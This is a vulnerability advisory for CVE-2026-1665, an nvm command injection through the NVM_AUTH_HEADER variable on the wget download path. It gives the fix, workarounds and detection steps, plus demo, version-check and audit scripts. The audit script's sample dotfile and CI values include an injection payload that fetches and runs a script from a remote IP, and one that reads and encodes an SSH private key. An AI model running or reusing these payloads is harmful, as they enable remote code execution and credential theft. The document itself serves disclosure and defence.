CVE-2026-1665
📋 TL;DR
This CVE describes a command injection vulnerability in nvm (Node Version Manager): when nvm falls back to wget for downloads, the NVM_AUTH_HEADER environment variable is spliced into the wget command line without sanitization, so shell metacharacters in its value are executed by the shell. An attacker who can set that variable in the victim's shell environment gets arbitrary command execution, as the victim's user, the next time the victim runs an nvm command that downloads something (for example nvm install). The curl download path is not affected. nvm versions 0.40.3 and below are affected; v0.40.4 fixes it.
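To make the bug class concrete, the following is an added example (not nvm's code and not from the advisory): a deliberately minimal reconstruction of the pattern the description implies, a header value spliced into a command string that is later handed to eval, next to the argv-based form that is immune to it. It assumes a stand-in downloader named fake_wget that only echoes its arguments so the script runs offline; the function names, the payload and the URL are invented for the demonstration.

```shell
#!/bin/sh
# Added example, not nvm's code: a minimal reconstruction of the bug class the
# advisory describes (an environment variable spliced into an eval'd wget command
# line) next to the argv-based pattern that is immune to it.

# Stand-in for wget so the example runs offline: it prints each argv entry on
# its own line, which shows exactly how the shell parsed the command.
fake_wget() {
  printf '%s\n' "$@"
}

# VULNERABLE pattern (assumed; mirrors the description, not nvm's exact source):
# the header is spliced into a string that eval re-parses, so a quote and a ';'
# inside NVM_AUTH_HEADER terminate the wget command and start a new one.
vuln_download() {
  args="-q -O - $1"
  if [ -n "${NVM_AUTH_HEADER:-}" ]; then
    args="$args --header \"$NVM_AUTH_HEADER\""
  fi
  eval fake_wget "$args"
}

# HARDENED pattern: build argv with set -- and "$@"; the header travels as one
# argument and is never re-parsed by the shell, whatever it contains.
safe_download() {
  url="$1"
  set -- -q -O - "$url"
  if [ -n "${NVM_AUTH_HEADER:-}" ]; then
    set -- "$@" --header "$NVM_AUTH_HEADER"
  fi
  fake_wget "$@"
}

# Payload an attacker would plant (malicious dotfile, CI variable, Docker ENV).
# The trailing ': "' keeps the eval'd line syntactically valid so nothing errors.
INJECTION_PAYLOAD='Authorization: x" ; echo INJECTED ; : "'

# Returns 0 when running the named downloader with the payload produced a bare
# INJECTED line, which can only come from a separately executed command.
injection_happened() {
  ( NVM_AUTH_HEADER="$INJECTION_PAYLOAD"; export NVM_AUTH_HEADER
    "$1" "https://nodejs.org/dist/index.json" ) | grep -qx INJECTED
}

demo() {
  for fn in vuln_download safe_download; do
    if injection_happened "$fn"; then
      echo "$fn: command injection succeeded"
    else
      echo "$fn: header passed through as data"
    fi
  done
}

demo
```

Running it prints which variant executed the planted echo. The rule it illustrates is general: a value that may contain quotes must never reach eval; pass it as its own argv element.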
💻 Affected Systems
- nvm (Node Version Manager)
⚠️ Manual Verification Required
The NVD entry for this CVE does not carry vendor-supplied version ranges, so automated version matching cannot tell on its own whether a given install is affected.
Why? No affected-version range is recorded in the CVE database entry. The vendor's fix release (v0.40.4, linked below) is the practical boundary: treat 0.40.3 and earlier as affected and verify manually:
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise with arbitrary command execution as the user running nvm, potentially leading to data theft, ransomware deployment, or lateral movement within the environment.
Likely Case
Arbitrary command execution as the developer account or CI service account in pipelines, development environments and containers where an attacker controls environment variables, for example through a malicious dotfiles repository, a CI variable that an untrusted pull request can influence, or an ENV baked into a base image. This is code execution at the victim's existing privilege level, not a privilege escalation by itself.
If Mitigated
Limited impact where the environment variables reaching developer shells and CI jobs come only from trusted, reviewed configuration and least privilege is enforced, so an attacker cannot set NVM_AUTH_HEADER at all.
🎯 Exploit Status
Exploitation requires the ability to set NVM_AUTH_HEADER in the environment of the shell that runs nvm, on a host where nvm uses wget, plus a victim action: an nvm command that downloads, such as nvm install. That precondition can be met through compromised CI/CD configuration, malicious dotfiles, or Docker images that export the variable; no interaction beyond a normal nvm run is needed after that.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: v0.40.4
Vendor Advisory: https://github.com/nvm-sh/nvm/releases/tag/v0.40.4
Restart Required: No (no reboot; already-open shells must reload nvm.sh to pick up the new version)
Instructions:
1. Update nvm using: curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.4/install.sh | bash
2. Or manually update by pulling the latest version from the nvm repository
3. Restart your terminal session, or re-source $NVM_DIR/nvm.sh, so the updated nvm function replaces the one already loaded in running shells (nvm is a sourced shell function, so an open shell keeps the old code until reloaded)
🔧 Temporary Workarounds
Ensure the curl download path is used
Configure nvm to use curl instead of wget for downloads: nvm prefers curl whenever it is on PATH and only falls back to wget when curl is missing, and the curl code path hands NVM_AUTH_HEADER to curl as a single argument instead of re-parsing it. Install curl on every host and build image that runs nvm; nvm does not document a variable for choosing the download tool (the NVM_DOWNLOAD_TOOL line sometimes quoted for this workaround has no effect in nvm.sh), so curl's presence on PATH is the control. Until curl is in place, keep the variable empty:
export NVM_AUTH_HEADER=""
Unset the vulnerable environment variable
Remove NVM_AUTH_HEADER from shell startup files, CI job variables and container images. When the variable is unset or empty, nvm adds no header and the unsafe interpolation is never reached; a private mirror that needs the header should wait for the patch.
unset NVM_AUTH_HEADER
🧯 If You Can't Patch
- Restrict who and what can set environment variables for CI/CD jobs and Docker image builds; treat NVM_AUTH_HEADER like a credential and allow it only from trusted, reviewed configuration
- Enforce least privilege for the accounts that run nvm and monitor for unexpected child processes of shells running nvm install
🔍 How to Verify
Check if Vulnerable:
Run nvm --version in a shell where nvm.sh has been sourced (nvm is a shell function, not a binary, so a bare shell or a CI step without the source line reports "command not found"). If the version is 0.40.3 or below, the system is vulnerable.
Check Version:
nvm --version
Verify Fix Applied:
After updating, verify with: nvm --version. Should show 0.40.4 or higher.
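The version check described above, as an added script that is not part of nvm or the advisory: it parses an nvm version string and compares it against 0.40.3, the last release this page lists as affected, and can source the user's nvm.sh to read the installed version. It assumes the default install location $NVM_DIR/nvm.sh (falling back to ~/.nvm) and that nvm --version prints a plain dotted version, optionally prefixed with v.

```shell
#!/bin/sh
# Added example, not part of the advisory or of nvm: decide from a version string
# whether an nvm install predates the fix (the advisory gives v0.40.4 as the patched
# release, so anything at or below 0.40.3 is treated as vulnerable).

LAST_VULNERABLE="0.40.3"

# version_key 0.40.3 -> 40003 : pack major.minor.patch into one integer for a
# plain numeric comparison. A leading "v" and a pre-release suffix such as -rc1
# are ignored; a missing minor or patch counts as 0. Returns 1 on anything that
# is not a dotted number.
version_key() {
  v="${1#v}"
  major="${v%%.*}"
  rest="${v#*.}"; [ "$rest" = "$v" ] && rest=0
  minor="${rest%%.*}"
  patch="${rest#*.}"; [ "$patch" = "$rest" ] && patch=0
  patch="${patch%%[!0-9]*}"; [ -n "$patch" ] || patch=0
  for part in "$major" "$minor" "$patch"; do
    case "$part" in ''|*[!0-9]*) return 1 ;; esac
  done
  echo $((major * 1000000 + minor * 1000 + patch))
}

# Returns 0 (true) when the version is vulnerable, 1 when patched, 2 if unparseable.
nvm_version_is_vulnerable() {
  key=$(version_key "$1") || return 2
  [ "$key" -le "$(version_key "$LAST_VULNERABLE")" ]
}

# Check the nvm installed for the current user. nvm is a shell function, so
# nvm.sh has to be sourced first; $NVM_DIR/nvm.sh is the default location
# (assumption: a standard install, run from bash).
check_installed_nvm() {
  nvm_sh="${NVM_DIR:-$HOME/.nvm}/nvm.sh"
  [ -s "$nvm_sh" ] || { echo "no nvm.sh at $nvm_sh"; return 2; }
  . "$nvm_sh"
  v=$(nvm --version)
  if nvm_version_is_vulnerable "$v"; then
    echo "nvm $v: VULNERABLE (<= $LAST_VULNERABLE), update to v0.40.4 or later"
    return 0
  fi
  echo "nvm $v: patched"
  return 1
}
```

Source the file in bash and run check_installed_nvm; it returns 0 when the install is vulnerable, 1 when patched and 2 when it could not read a version, so it drops straight into a CI gate.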
📡 Detection & Monitoring
Log Indicators:
- Child processes spawned by a shell running nvm install other than the downloader (wget or curl) and the archive tools nvm normally invokes; any other command launched between download and extraction is suspect
- NVM_AUTH_HEADER appearing in process environments, dotfiles, CI variables or image ENV with shell metacharacters (quotes, semicolons, pipes, $( )) rather than a plain "Header: value" string
Network Indicators:
- Outbound connections from an nvm download step to hosts other than the configured Node mirror (nodejs.org/dist by default, or the value of NVM_NODEJS_ORG_MIRROR)
SIEM Query:
process.name:"bash" AND command_line:"*nvm*" AND (command_line:"*wget*" OR command_line:"*curl*")
Note: this query matches every legitimate nvm install as well; use it to scope the time window, then inspect the child processes of those shells for anything other than the downloader and archive tools.
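One concrete form of the audit that the "If You Can't Patch" items and the log indicators above call for, as an added example that is not from nvm or this advisory: a script that scans dotfiles, CI config and Dockerfiles for NVM_AUTH_HEADER assignments and flags any value carrying shell metacharacters. The sample files it creates in a temporary directory (a benign .bashrc, a planted .zshrc, a CI variables file) are constructed for the demonstration, and the metacharacter list is a judgment call, not an nvm definition.

```shell
#!/bin/sh
# Added example, not from nvm or the advisory: audit the places an attacker would
# plant NVM_AUTH_HEADER (shell startup files, CI config, Dockerfiles) for values
# that carry shell metacharacters. A legitimate value is one HTTP header line such
# as "Authorization: Bearer <token>" and never needs ';', '|', '&', backticks or "$(".

# Print each NVM_AUTH_HEADER assignment found in the given files, prefixed with
# OK or SUSPICIOUS. Handles `export NVM_AUTH_HEADER=...`, `NVM_AUTH_HEADER=...`,
# Dockerfile `ENV NVM_AUTH_HEADER=...` and YAML `NVM_AUTH_HEADER: ...` forms.
audit_auth_header() {
  grep -Hn 'NVM_AUTH_HEADER' "$@" 2>/dev/null | while IFS= read -r line; do
    value="${line#*NVM_AUTH_HEADER}"   # text after the variable name
    value="${value#[=:]}"              # drop the = or : separator
    value="${value# }"
    case "$value" in
      *\;*|*\|*|*\&*|*\`*|*\$\(*|*\$\{*|*\<*|*\>*)
        printf 'SUSPICIOUS %s\n' "$line" ;;
      *)
        printf 'OK %s\n' "$line" ;;
    esac
  done
}

# Number of SUSPICIOUS hits across the given files (prints 0 rather than failing).
count_suspicious() {
  audit_auth_header "$@" | grep -c '^SUSPICIOUS' || true
}

# Constructed sample files standing in for a developer's dotfiles and CI config;
# the IP is from the documentation range and the token is a placeholder.
make_samples() {
  dir=$(mktemp -d)
  cat > "$dir/.bashrc" <<'EOF'
export NVM_DIR="$HOME/.nvm"
export NVM_AUTH_HEADER="Authorization: Bearer ghp_exampletoken"
EOF
  cat > "$dir/.zshrc" <<'EOF'
# planted by a malicious dotfiles repository
export NVM_AUTH_HEADER='x" ; curl -s http://203.0.113.5/p | sh ; : "'
EOF
  cat > "$dir/.gitlab-ci.yml" <<'EOF'
variables:
  NVM_AUTH_HEADER: 'Authorization: Bearer $(cat ~/.ssh/id_ed25519 | base64)'
EOF
  echo "$dir"
}

# Usage against real files: audit_auth_header ~/.bashrc ~/.zshrc ~/.profile .gitlab-ci.yml Dockerfile
SAMPLES=$(make_samples)
audit_auth_header "$SAMPLES/.bashrc" "$SAMPLES/.zshrc" "$SAMPLES/.gitlab-ci.yml"
rm -rf "$SAMPLES"
```

Point audit_auth_header at every file a shell or CI runner reads before nvm runs; a SUSPICIOUS line in a repository that untrusted contributors can edit is the precondition this CVE needs.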